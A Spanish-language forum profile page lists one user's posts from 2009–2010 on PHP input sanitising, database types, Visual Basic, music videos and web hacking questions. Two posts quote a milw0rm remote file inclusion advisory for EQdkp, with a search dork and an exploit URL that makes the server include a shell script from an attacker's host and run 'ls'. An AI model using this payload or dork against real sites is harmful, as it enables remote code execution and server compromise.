Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Pazador

Páginas 1 2 3 4 5 6
#41
Nivel Web / Re: Como bypassear función str_replace()?
10 Marzo 2010, 19:05 PM
Cita de: janito24 en 10 Marzo 2010, 07:24 AM
Como me recomendaste esa vez mejor usar htmlspecialchars con ENT_QUOTES, aún asi sí quieres joder a los h4x0rs un rato podrías revisar la variable en busca de <, >, ' y " y lanzar un mensaje de "te estoy viendo eh!" ja ja ja


Cita de: WHK en 10 Marzo 2010, 11:07 AM
y porque no usar htmlspecialchars? es nativo de php y cumple bien su función.

Ahora también hay temas relacionados con la codificación de documento como utf-7 pero eso ya es otro tema.

hay alguna diferencia si uso htmlentities("$X",ENT_QUOTES) ?? yo lo uso en lugar de htmlspecialchars  :huh:
#42
Foro Libre / Re: ¿Que estas escuchando?
20 Febrero 2010, 20:42 PM
Unos cuantos temas de una de las mejores bandas no conocidas del Peru  ::)

[youtube=625,360]<object width="680" height="395"><param name="movie" value="http://www.youtube.com/v/2zYwM7lppUg&hl=es_ES&fs=1&color1=0x3a3a3a&color2=0x999999"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/2zYwM7lppUg&hl=es_ES&fs=1&color1=0x3a3a3a&color2=0x999999" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="680" height="395"></embed></object>[/youtube]

[youtube=625,360]<object width="680" height="395"><param name="movie" value="http://www.youtube.com/v/7AGL9sDqDdo&hl=es_ES&fs=1&color1=0x3a3a3a&color2=0x999999"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/7AGL9sDqDdo&hl=es_ES&fs=1&color1=0x3a3a3a&color2=0x999999" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="680" height="395"></embed></object>[/youtube]

[youtube=625,360]<object width="680" height="395"><param name="movie" value="http://www.youtube.com/v/1RUdQ3ZCs4A&hl=es_ES&fs=1&color1=0x3a3a3a&color2=0x999999"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/1RUdQ3ZCs4A&hl=es_ES&fs=1&color1=0x3a3a3a&color2=0x999999" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="680" height="395"></embed></object>[/youtube]

[youtube=625,360]<object width="680" height="395"><param name="movie" value="http://www.youtube.com/v/_LQ6gNBSFXM&hl=es_ES&fs=1&color1=0x3a3a3a&color2=0x999999"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/_LQ6gNBSFXM&hl=es_ES&fs=1&color1=0x3a3a3a&color2=0x999999" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="680" height="395"></embed></object>[/youtube]

[youtube=625,360]<object width="680" height="395"><param name="movie" value="http://www.youtube.com/v/LQoHY80V4xU&hl=es_ES&fs=1&color1=0x3a3a3a&color2=0x999999"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/LQoHY80V4xU&hl=es_ES&fs=1&color1=0x3a3a3a&color2=0x999999" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="680" height="395"></embed></object>[/youtube]

[youtube=625,360]<object width="680" height="395"><param name="movie" value="http://www.youtube.com/v/Y3GSv_ZL4So&hl=es_ES&fs=1&color1=0x3a3a3a&color2=0x999999"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/Y3GSv_ZL4So&hl=es_ES&fs=1&color1=0x3a3a3a&color2=0x999999" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="680" height="395"></embed></object>[/youtube]

[youtube=625,360]<object width="680" height="395"><param name="movie" value="http://www.youtube.com/v/YHZ1gSHklmY&hl=es_ES&fs=1&color1=0x3a3a3a&color2=0x999999"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/YHZ1gSHklmY&hl=es_ES&fs=1&color1=0x3a3a3a&color2=0x999999" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="680" height="395"></embed></object>[/youtube]
#43
Foro Libre / Re: ¿Que estas escuchando?
28 Enero 2010, 04:51 AM
musica para deleitarse los oidos


[youtube=425,350]<object width="560" height="340"><param name="movie" value="http://www.youtube.com/v/rj8lDsUMio4&hl=es_ES&fs=1&"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/rj8lDsUMio4&hl=es_ES&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="560" height="340"></embed></object>[/youtube]

la amo.. afortunadamente fui a a verla cuando canto en mi pais.. fue impresionante..  ;)
#44
PHP / Re: No puedo enviar un email
7 Enero 2010, 21:18 PM
Cita de: yoyahack en  7 Enero 2010, 15:27 PM
Ese code que hisiste es vulnerable a CLRF

quizas quisiste decir CRLF.. pero diiiisculpa mi ignorancia peroo....  no veo ninguna vulnerabilidad aqui, solo se va enviar un mail, aqui no se esta usando bd, ni publicando mensajes en una web.. solo se enviara un mail?? acaso juakearan el mail webmaster@example.com :xD que cosa podrian hacer con dicha vulnerabilidad que no existe??
#45
PHP / Re: SignMe 2.0 - Segunda versión de mi libro de visitas en PHP
1 Diciembre 2009, 15:50 PM
Gracias por tu tiempo, pero si se deshabilita .js desde firefox, si se podria enviar datos en blanco  :-X mejor seria una validacion con php  ;D

Citar* Antes se podían enviar comentarios en blanco, ahora si alguien deja en blanco el campo del comentario (bien porque se le olvidó rellenarlo o bien porque quería molestar enviando a lo tonto), no podrá, ya que le saltará una alerta ‭‬‭‬javascript instándole a que rellene el campo del comentario para poder enviar el comentario.
#46
Bases de Datos / Re: Dudas con atributos a los campos de una tabla
1 Diciembre 2009, 15:15 PM
wow, wow, wow  muy interesante :P esto era lo que queria leer  :D
ahora mismo me cambiare a char() y ordenare cada dato con su atributo correspondiente y luego profundizare mas sobre las bd
gracias por quitarme la venda de los ojos  :-*
#47
Bases de Datos / Dudas con atributos a los campos de una tabla
29 Noviembre 2009, 04:25 AM
hola a todos, resulta que quiero saber para que fucking demonios sirve el maldito NOT NULL?? como su nombre lo dice "no nulo" se supone que no deberia aceptar campos vacio.. pero lo hace, se puede agregar campos vacios a una tabla, o mejor dicho, no agregar nada a ese campo, pero si a los demas sin problemas, alguien que me explique entonces para que sirve?? porque de adorno no luce bien  :xD

Código [Seleccionar]
create table tablita(
id int NOT NULL,
nombre varchar(50) NOT NULL,
.........
);

y tambien decirles que a veces (miento!! esto lo hago siempre!!  :xD) yo suelo insertar datos en formato de fecha, numericos o string a determinados campos de una tabla, y por defecto a TODO lo llamo varchar no uso date, int (int solo uso para el id) u otros atributos porque hasta ahora todo trabaja bien sin problemas  :xD, pero mi pregunta es... hay alguna diferencia o punto en contra con la forma que estoy trabajando?? se que voy contra las reglas pero quiero oir criticas constructivas.. o mejor aun.. que me quiten la venda de los ojos  :D
saludos y no sean tan severos conmigo  :laugh:
#48
Programación Visual Basic / Re: Ayuda CON mi proyecto
6 Agosto 2009, 03:08 AM
Cita de: seba123neo en  6 Agosto 2009, 01:54 AM
Cita de: blood_brother en  4 Agosto 2009, 04:18 AM
quiero hacer un laucnher/actualizador pero no conozco mucho de visual basic, tambien quiero colocas imagen de fondo .png

yo quiero hacer una nave espacial que valla a saturno y vuelva en 1 dia, pero no se nada, ¿que me recomiendan?...

PD:poner titulos descriptivos en los POST...



no paro de reir  :xD
aproposito... yo si estoy aprendiendo a programar en visual basic pero visual 6 ya voy 2 dias y todo se ve facilicimo (porque tengo nociones intermedias de php) pero alguien me podria recomendar si mejor dejo visual basic 6 para ir tras visual 2005 o 2008 ?? algun master que sepa que es lo mas recomendable??
#49
Nivel Web / Re: Duda con LFI
6 Agosto 2009, 03:02 AM
Cita de: braulio23 en  5 Agosto 2009, 14:00 PM

Fijate que el archivo con el cual intentas hacer la inclusión es un jpg, el servidor, aunque la imagen tenga código php , lo va a interpretar como una imagen.

Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls
Ves la diferencia?
Aquí te dejo un tutorial de como bypassear los filtros.

gracias por la respuesta  :D ahora si que ya voy entendiendo, leere el link que esta bueno, saludos  ;D
#50
Nivel Web / Re: Duda con LFI
3 Agosto 2009, 23:27 PM
disculpen que insista preguntando sobre la misma duda pero aqui encontre un ejemplo de lo que tanto comentaba (y se supone que funciona)

CitarTitle: EQdkp <= 1.3.0 Remote File Inclusion
URL: http://www.eqdkp.com/
Dork: "powered by EQdkp"
Author: OLiBekaS
greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew

Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-05-07]

se supone que esto debe funcionar no?? o es un bug obsoleto?? o el enano milw0rm se equivoco?? (milw0rm me suena a nombre de un enano de cuentos de hadas  :xD) porque el si puede ejecutar codigo arbitrario y yo no, o tal vez la unica solucion seria cambiar mi imagen fake.jpg a fake.gif??  :D  ... aun asi tengo el mismo resultado :-[
lo encontre aqui http://www.milw0rm.com/exploits/1764
necesito una explicacion   :huh:  ;D  :rolleyes:
Páginas 1 2 3 4 5 6